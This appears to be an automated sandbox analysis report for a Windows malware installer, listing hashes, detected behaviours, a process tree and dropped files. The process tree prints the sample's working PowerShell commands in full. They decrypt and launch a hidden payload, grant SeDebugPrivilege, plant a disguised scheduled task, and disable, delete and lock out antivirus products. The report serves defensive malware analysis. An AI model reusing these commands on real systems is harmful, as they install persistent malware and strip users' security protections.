Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    22-11-2024 03:47

General

  • Target

    71a989d9d893661e66be5d259cad821f5dbc0a58933ea69cd0634b87d42e89db.exe

  • Size

    21.2MB

  • MD5

    f6ce1ee1de72a6286bc07263b1f3935a

  • SHA1

    514703f64abfa8ab53995cdacda6e90fc8b4650a

  • SHA256

    71a989d9d893661e66be5d259cad821f5dbc0a58933ea69cd0634b87d42e89db

  • SHA512

    e3906cd91a466f91a6717d9568603e0b733f29286d1fe73256bb0b105fa50dc54a33bb3e013521c9ec5ff43101ea40f912d000c16d93f4ba0587dcab18b0399b

  • SSDEEP

    393216:kecsJTzmKnYuOKzur7M+uQTwLCrws9PuRX08rYK4FcQod:ZNYyzC7PuwqCEsIRXlV4nod

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Modifies RDP port number used by Windows 1 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 13 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 5 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs
  • System policy modification 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\71a989d9d893661e66be5d259cad821f5dbc0a58933ea69cd0634b87d42e89db.exe
    "C:\Users\Admin\AppData\Local\Temp\71a989d9d893661e66be5d259cad821f5dbc0a58933ea69cd0634b87d42e89db.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4860
    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
      "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5904754 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\71a989d9d893661e66be5d259cad821f5dbc0a58933ea69cd0634b87d42e89db.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-4050598569-1597076380-177084960-1000"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2136
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command function Copy-Stream { param( [IO.Stream]$FromStream, [IO.Stream]$ToStream ) $buff = New-Object 'byte[]' -ArgumentList 80kb while (($readCount = $FromStream.Read($buff, 0, $buff.Length)) -gt 0) { $ToStream.Write($buff, 0, $readCount) } } function Get-FixedBytes { param( [byte[]]$Bytes, [int]$Size ) if ($Bytes.Length -eq $Size) { return , $Bytes } if ($Bytes.Length -gt $Size) { return , $Bytes[0..($Size - 1)] } return , ($Bytes + (New-Object 'byte[]' ($Size - $Bytes.Length) )) } function Unprotect-AesData { [CmdletBinding()] param ( [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [string[]]$FromFile, [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Alias(\"PSPath\")] [string[]]$FromLiteralFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, Position = 1)] [string]$ToFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $false)] [switch]$Append, [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = 
\"FromStreamToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [System.IO.Stream[]]$FromStream, [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToStream\", Mandatory = $true, Position = 1)] [System.IO.Stream]$ToStream, [ValidateSet(128, 192, 256)] [int]$KeySize = 256, [System.Security.Cryptography.CipherMode]$Mode = [System.Security.Cryptography.CipherMode]::CBC, [System.Security.Cryptography.PaddingMode]$Padding = [System.Security.Cryptography.PaddingMode]::PKCS7, [byte[]]$Key1, [byte[]]$IV1, [System.Security.SecureString]$Password, [byte[]]$PasswordBytes, [string]$PasswordPlain, [ValidateNotNullOrEmpty()] [ValidateCount(8, 2147483647)] [byte[]]$Salt = (200, 78, 178, 161, 117, 108, 182, 25, 83, 212, 170, 163, 245, 143, 72, 180, 117, 109, 100, 180, 172, 49, 207, 73, 78, 231, 183, 46, 143, 113, 43, 64), [int]$Iteration = 1000, [ValidateNotNullOrEmpty()] [string]$KeyHashAlg = 'SHA1' ) begin { $formatDebug = \"NamedBlock = {0,-10}, ParameterSetName = {1}\" $PSCmdlet.WriteDebug(($formatDebug -f \"begin\", $PSCmdlet.ParameterSetName)) # if (-not ($PSBoundParameters.ContainsKey('Password') -xor $PSBoundParameters.ContainsKey('PasswordBytes'))) { # throw \"Parameter 'Password' and 'PasswordBytes' must be bounded to only one, not both.\" # } try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding if ($null -ne $Key1) { $aes.Key = Get-FixedBytes -Bytes $Key1 -Size ($aes.KeySize / 8) if ($null -ne $IV1) { $aes.IV = Get-FixedBytes -Bytes $IV1 -Size ($aes.BlockSize / 8) } } else { try { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { 
(New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration, [System.Security.Cryptography.HashAlgorithmName]$KeyHashAlg) } catch { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { (New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration) #for ps2.0 } $aes.Key = $keyGen.GetBytes($aes.KeySize / 8) $aes.IV = $keyGen.GetBytes($aes.BlockSize / 8) } $Key1 = $aes.Key $IV1 = $aes.IV if ($PSBoundParameters.ContainsKey(\"ToFile\")) { $filemode = if ($Append) { [System.IO.FileMode]::Append }else { [System.IO.FileMode]::Create } $ToStream = New-Object System.IO.FileStream -ArgumentList ($ToFile, $filemode, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None) -ErrorAction Stop } } catch { if ($ToFile -and $ToStream) { $ToStream.Close() } throw } finally { if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } process { $PSCmdlet.WriteDebug(($formatDebug -f \"process\", $PSCmdlet.ParameterSetName)) if (\"FromStreamToFile\", \"FromStreamToStream\" -contains $PSCmdlet.ParameterSetName) { foreach ($itemStream in $FromStream) { try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() try { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, 
$transform, [System.Security.Cryptography.CryptoStreamMode]::Read, $true) } catch { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) } # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } return } foreach ($apath in $(if (\"FromFileToFile\", \"FromFileToStream\" -contains $PSCmdlet.ParameterSetName) { Convert-Path -Path $FromFile } else { Convert-Path -LiteralPath $FromLiteralFile })) { try { $itemStream = New-Object System.IO.FileStream -ArgumentList ($apath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read) [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($itemStream) { $itemStream.Close() Clear-Variable -Name itemStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } } end { $PSCmdlet.WriteDebug(($formatDebug -f \"end\", $PSCmdlet.ParameterSetName)) if 
($PSBoundParameters.ContainsKey(\"ToFile\")) { $ToStream.Close() } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } # main $FromLiteralFile = \"C:\ProgramData\Program\Uninstall_.exe\" $ToFile = \"C:\ProgramData\Program\iusb3mon.exe\" $PasswordPlain = \"123\" if ($FromLiteralFile -ne $ToFile) { Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $ToFile -PasswordPlain $PasswordPlain } else { #inplace $fi0 = Get-Item -LiteralPath $FromLiteralFile -ErrorAction SilentlyContinue if ($null -ne $fi0) { $tmpfile = [IO.Path]::GetTempFileName() Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $tmpfile -PasswordPlain $PasswordPlain if ($?) { Move-Item -LiteralPath $tmpfile -Destination $ToFile -Force } } } #ps1Ö´ÐÐexe Start-Process -FilePath $ToFile -ArgumentList '$false' -WorkingDirectory ([IO.Path]::GetDirectoryName($ToFile)) -WindowStyle Hidden
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3668
        • C:\ProgramData\Program\iusb3mon.exe
          "C:\ProgramData\Program\iusb3mon.exe" $false
          4⤵
          • UAC bypass
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2736
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3996
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4132
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5112
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1200
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1264
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1488
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4804
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1480
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3176
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4848
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3984
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:3176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1428
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1816
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match 'ÌÚѶµçÄԹܼÒ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1616
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3352
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1004
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1920

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Program Files\product1\Uninstall\uninstall.xml

      Filesize

      7KB

    • C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

      Filesize

      3KB

    • C:\ProgramData\Microsoft\Program\ziliao.jpg

      Filesize

      225KB

    • C:\ProgramData\Program\Uninstall_.exe

      Filesize

      475KB

    • C:\ProgramData\Program\iusb3mon.dat

      Filesize

      74KB

    • C:\ProgramData\Program\iusb3mon.exe

      Filesize

      475KB

    • C:\ProgramData\templateWatch.dat

      Filesize

      59KB

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      1KB

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

